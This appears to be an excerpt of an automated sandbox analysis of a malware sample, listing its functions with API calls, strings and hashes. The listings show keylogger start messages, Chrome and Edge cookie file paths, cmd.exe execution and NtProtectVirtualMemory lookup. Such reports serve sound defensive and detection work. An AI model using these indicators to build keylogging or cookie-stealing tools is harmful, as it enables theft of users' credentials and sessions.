                                                                                                                                                    Function 156CE6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _strpbrk.LIBCMT ref: 156CE738
                                                                                                                                                    • _free.LIBCMT ref: 156CE855
                                                                                                                                                      • Part of subcall function 156BBD19: IsProcessorFeaturePresent.KERNEL32(00000017,156BBCEB,?,?,?,?,?,00000000,?,?,156BBD0B,00000000,00000000,00000000,00000000,00000000), ref: 156BBD1B
                                                                                                                                                      • Part of subcall function 156BBD19: GetCurrentProcess.KERNEL32(C0000417), ref: 156BBD3D
                                                                                                                                                      • Part of subcall function 156BBD19: TerminateProcess.KERNEL32(00000000), ref: 156BBD44
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                    • String ID: *?$.
                                                                                                                                                    • API String ID: 2812119850-3972193922
                                                                                                                                                    • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                                                                                                    • Instruction ID: d778b6af930ea152a0cb98583ae660778caabaab794c437890677fb09e227436
                                                                                                                                                    • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                                                                                                    • Instruction Fuzzy Hash: FC51A475E0120AEFDB15CFA8CC80AADBBB5FF48314F2541A9D454E7740D675AE01CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DEAABC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,02DEAC8C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02DEAAEB
                                                                                                                                                      • Part of subcall function 02DEA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DEA79E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                    • String ID: eeee$ggg$yyyy
                                                                                                                                                    • API String ID: 4232894706-1253427255
                                                                                                                                                    • Opcode ID: 6fe77194e02951cbb77aee648680436e84df2d3661706c952f0df5552b04e0c0
                                                                                                                                                    • Instruction ID: 59ac9abbbbdea8e0509efd92e6ae3bc518394b2e3b42dd9b56af538a35e136f7
                                                                                                                                                    • Opcode Fuzzy Hash: 6fe77194e02951cbb77aee648680436e84df2d3661706c952f0df5552b04e0c0
                                                                                                                                                    • Instruction Fuzzy Hash: 9641D0387045068BDF11FBB989902BEB7EBEB85300FA445A6E483C7354D634ED02DAB1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1568C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 1568C4F6
                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 1568C61D
                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 1568C688
                                                                                                                                                    Strings
                                                                                                                                                    • User Data\Default\Network\Cookies, xrefs: 1568C603
                                                                                                                                                    • User Data\Profile ?\Network\Cookies, xrefs: 1568C635
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                    • API String ID: 1174141254-1980882731
                                                                                                                                                    • Opcode ID: fd2d47e5990b966227c561261d29bccc697ea565141f5d48cf470f7caad291d6
                                                                                                                                                    • Instruction ID: c76b8010380922982eeddeba650ba61d48f1945a9704a301ed8968e00e4d2cf9
                                                                                                                                                    • Opcode Fuzzy Hash: fd2d47e5990b966227c561261d29bccc697ea565141f5d48cf470f7caad291d6
                                                                                                                                                    • Instruction Fuzzy Hash: 06213075B022199ADB04EBB1DC55CEEBB7CFE50211F400129E502A7194EF30BA8AC6D4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1568C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 1568C559
                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 1568C6EC
                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 1568C757
                                                                                                                                                    Strings
                                                                                                                                                    • User Data\Default\Network\Cookies, xrefs: 1568C6D2
                                                                                                                                                    • User Data\Profile ?\Network\Cookies, xrefs: 1568C704
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                    • API String ID: 1174141254-1980882731
                                                                                                                                                    • Opcode ID: fedb33110d3a7e2fd523cc59fa66f62d3d1d3113cc87f6262daf7d513c2b0d39
                                                                                                                                                    • Instruction ID: afc870e4e1779d4fe3e943a63173aff9c3354616d7a0c23e938c270e616e543b
                                                                                                                                                    • Opcode Fuzzy Hash: fedb33110d3a7e2fd523cc59fa66f62d3d1d3113cc87f6262daf7d513c2b0d39
                                                                                                                                                    • Instruction Fuzzy Hash: 4C213075F02219DADF04EBA1DC55CEEBB7CFE50611F400129E502A7194EF30BA4AC6D8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,1568A27D,156F50F0,00000000,00000000), ref: 1568A1FE
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,1568A267,156F50F0,00000000,00000000), ref: 1568A20E
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,1568A289,156F50F0,00000000,00000000), ref: 1568A21A
                                                                                                                                                      • Part of subcall function 1568B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,156F50F0), ref: 1568B172
                                                                                                                                                      • Part of subcall function 1568B164: wsprintfW.USER32 ref: 1568B1F3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                    • String ID: Offline Keylogger Started
                                                                                                                                                    • API String ID: 465354869-4114347211
                                                                                                                                                    • Opcode ID: db9f95140e49fa52683de3ff20699c636b0739423838479b22c383cd8a786a85
                                                                                                                                                    • Instruction ID: 602c596a73c02f25c6c7691e51785257ba999a2ab7ae9dc57d1b7fbb633cb25f
                                                                                                                                                    • Opcode Fuzzy Hash: db9f95140e49fa52683de3ff20699c636b0739423838479b22c383cd8a786a85
                                                                                                                                                    • Instruction Fuzzy Hash: 1B11C6B92053087ED230BB359C95CBF766DDA811A8B40062DF84702151EE617D54CBF6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1568B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,156F50F0), ref: 1568B172
                                                                                                                                                      • Part of subcall function 1568B164: wsprintfW.USER32 ref: 1568B1F3
                                                                                                                                                      • Part of subcall function 1569B4EF: GetLocalTime.KERNEL32(00000000), ref: 1569B509
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,1568A267,?,00000000,00000000), ref: 1568AF6E
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,1568A289,?,00000000,00000000), ref: 1568AF7A
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,1568A295,?,00000000,00000000), ref: 1568AF86
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                    • String ID: Online Keylogger Started
                                                                                                                                                    • API String ID: 112202259-1258561607
                                                                                                                                                    • Opcode ID: c5f4a5381e97610417ff8192bfc7d75bb76774c3126088b614db7af45283a054
                                                                                                                                                    • Instruction ID: f79fa2c150c9d0fbb1cfb47cb22fd0c139cde8f0469fc58f4d73a73b0acfde26
                                                                                                                                                    • Opcode Fuzzy Hash: c5f4a5381e97610417ff8192bfc7d75bb76774c3126088b614db7af45283a054
                                                                                                                                                    • Instruction Fuzzy Hash: A301C0E8B063593EE63076358C85DBF7A6DCA820A4B840628F98217645D9613C49C7F6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15684F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 15684F81
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 15684FCD
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,15685150,?,00000000,00000000), ref: 15684FE0
                                                                                                                                                    Strings
                                                                                                                                                    • KeepAlive | Enabled | Timeout: , xrefs: 15684F94
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create$EventLocalThreadTime
                                                                                                                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                    • API String ID: 2532271599-1507639952
                                                                                                                                                    • Opcode ID: daa87240bfe2a87827b6e4b63ed0ccc3615e96198be09f5bb4abdfd2196defdf
                                                                                                                                                    • Instruction ID: 0a465889b1a9651952fe88eb11b6e7416a1e35153fcada769300a3a56ffa60e1
                                                                                                                                                    • Opcode Fuzzy Hash: daa87240bfe2a87827b6e4b63ed0ccc3615e96198be09f5bb4abdfd2196defdf
                                                                                                                                                    • Instruction Fuzzy Hash: 8311C2359053986AD720AAB68C48E9F7FBCABD2725F04050EE88257254DA70A445CBF2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,15685159), ref: 15685173
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 156851CA
                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 156851D9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                    • String ID: Connection Timeout
                                                                                                                                                    • API String ID: 2055531096-499159329
                                                                                                                                                    • Opcode ID: 3f341f1ec978546293ce7e2615e28621c0f9eb10d6b17b7972f73c2acb184b10
                                                                                                                                                    • Instruction ID: 50fc47be68fb6c0c84ba98c7f196a2b047813a671b0397478065d84c42cbcbbb
                                                                                                                                                    • Opcode Fuzzy Hash: 3f341f1ec978546293ce7e2615e28621c0f9eb10d6b17b7972f73c2acb184b10
                                                                                                                                                    • Instruction Fuzzy Hash: F701F735616B50BFE725AF368CD442ABBD5FF10112300092DD5C382E60EB20B400CFD1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 1568E833
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw
                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                    • API String ID: 2005118841-1866435925
                                                                                                                                                    • Opcode ID: dfac57e973c0dc3c4e4ad2695e9c95b308f9f1eb6d583a60f158ef8d466919b1
                                                                                                                                                    • Instruction ID: 93f789ce569d6922dd74e682a0b9652dc61d9fe9990499485c10ec4a7df716db
                                                                                                                                                    • Opcode Fuzzy Hash: dfac57e973c0dc3c4e4ad2695e9c95b308f9f1eb6d583a60f158ef8d466919b1
                                                                                                                                                    • Instruction Fuzzy Hash: DC0128B0A463487FE744EA90CC42FFD7768AB24201F008008ED15A5480FA767E05C7F7
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1568DFB1
                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 1568DFF0
                                                                                                                                                      • Part of subcall function 156B5640: _Yarn.LIBCPMT ref: 156B565F
                                                                                                                                                      • Part of subcall function 156B5640: _Yarn.LIBCPMT ref: 156B5683
                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 1568E016
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                    • API String ID: 3628047217-1405518554
                                                                                                                                                    • Opcode ID: c425973e372a9f5825bae198f8c0b98b7041d1083515b7f241f84f6a825953e4
                                                                                                                                                    • Instruction ID: d68359cc66b6a78799be126ada65ea3bed685442095782f64b5a2842cd4b2c90
                                                                                                                                                    • Opcode Fuzzy Hash: c425973e372a9f5825bae198f8c0b98b7041d1083515b7f241f84f6a825953e4
                                                                                                                                                    • Instruction Fuzzy Hash: 70F0623A7027049AC734EB60EC619DAF7B89F24310F504A6DAA2612490EF74BA19C7DC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,156E611C), ref: 1569377E
                                                                                                                                                    • RegSetValueExA.ADVAPI32(156E611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,1569CAB1,WallpaperStyle,156E611C,00000001,156F4EE0,00000000), ref: 156937A6
                                                                                                                                                    • RegCloseKey.ADVAPI32(156E611C,?,?,1569CAB1,WallpaperStyle,156E611C,00000001,156F4EE0,00000000,?,1568875D,00000001), ref: 156937B1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateValue
                                                                                                                                                    • String ID: Control Panel\Desktop
                                                                                                                                                    • API String ID: 1818849710-27424756
                                                                                                                                                    • Opcode ID: 6af9ae4f44883eecba53ba8602fd6c4d74953e6f965600eb7c475314f14d20d1
                                                                                                                                                    • Instruction ID: 45550d5817642686086fd31fe743358706d6d882660dce54b18526aebd191aca
                                                                                                                                                    • Opcode Fuzzy Hash: 6af9ae4f44883eecba53ba8602fd6c4d74953e6f965600eb7c475314f14d20d1
                                                                                                                                                    • Instruction Fuzzy Hash: 46F06D76601118FFCB009FA0DC45EEA3B7DEF08650F104658FD05AA110EB31AE14DBE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156960EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 15696130
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExecuteShell
                                                                                                                                                    • String ID: /C $cmd.exe$open
                                                                                                                                                    • API String ID: 587946157-3896048727
                                                                                                                                                    • Opcode ID: 9492d0c3a0e0a2eece7d97c399398b85a68a46f7f010fd27bd350b3807bf1a81
                                                                                                                                                    • Instruction ID: faa6339fc4c94fae7b9e118c698b805fa99f0213364bb665ad9974ef5e74185c
                                                                                                                                                    • Opcode Fuzzy Hash: 9492d0c3a0e0a2eece7d97c399398b85a68a46f7f010fd27bd350b3807bf1a81
                                                                                                                                                    • Instruction Fuzzy Hash: D3E0EDB420A308AFDB08DBB4CCA4CBF73EDAE50205B400C1CB14292190EF74BD09C6E9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DF79FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 02DF7A09
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02DF7A0F
                                                                                                                                                    Strings
                                                                                                                                                    • NtProtectVirtualMemory, xrefs: 02DF79FF
                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 02DF7A04
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                                                                                    • API String ID: 1646373207-1386159242
                                                                                                                                                    • Opcode ID: f217b205878e19636e16a7b62c6b526ab81c9bae8591cfa6ec419536ff552d6d
                                                                                                                                                    • Instruction ID: 90564b52e8bd814bb1f600af289673e461fb5e70cb0704bb38865c52fb5bf9e8
                                                                                                                                                    • Opcode Fuzzy Hash: f217b205878e19636e16a7b62c6b526ab81c9bae8591cfa6ec419536ff552d6d
                                                                                                                                                    • Instruction Fuzzy Hash: A2E04FB555020CAF9B80EEA9EC41D8B37DCAB28600B404405BA09D3300C270E9518FB4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DEC430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,02E0A10B,00000000,02E0A11E), ref: 02DEC436
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02DEC447
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                    • API String ID: 1646373207-3712701948
                                                                                                                                                    • Opcode ID: b80098521ab533c8cd81a4fd5a37a020d06b3fc36323fa0b91c289b3ee496a1e
                                                                                                                                                    • Instruction ID: 095b2b6e6eaf3bd152781196425f5b0373947e2b22e57085237e18ecbdc853f5
                                                                                                                                                    • Opcode Fuzzy Hash: b80098521ab533c8cd81a4fd5a37a020d06b3fc36323fa0b91c289b3ee496a1e
                                                                                                                                                    • Instruction Fuzzy Hash: 39D05EA0AE03454EFF00BBB274C063933D8EB24719F80882EE00355308D672DC948FB8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156CA004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                    • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                                                                                                                                    • Instruction ID: 486e3574ad1a64c7950ca964cb3fc297caa40b76f4ccaa8d1c096c4083505dd6
                                                                                                                                                    • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
